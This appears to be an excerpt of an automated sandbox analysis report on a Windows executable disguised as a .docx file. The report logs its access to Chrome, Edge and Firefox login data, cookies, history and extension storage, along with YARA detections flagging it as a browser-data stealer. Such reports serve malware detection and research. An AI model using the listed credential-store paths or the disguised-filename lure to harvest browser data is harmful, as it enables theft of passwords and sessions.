Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
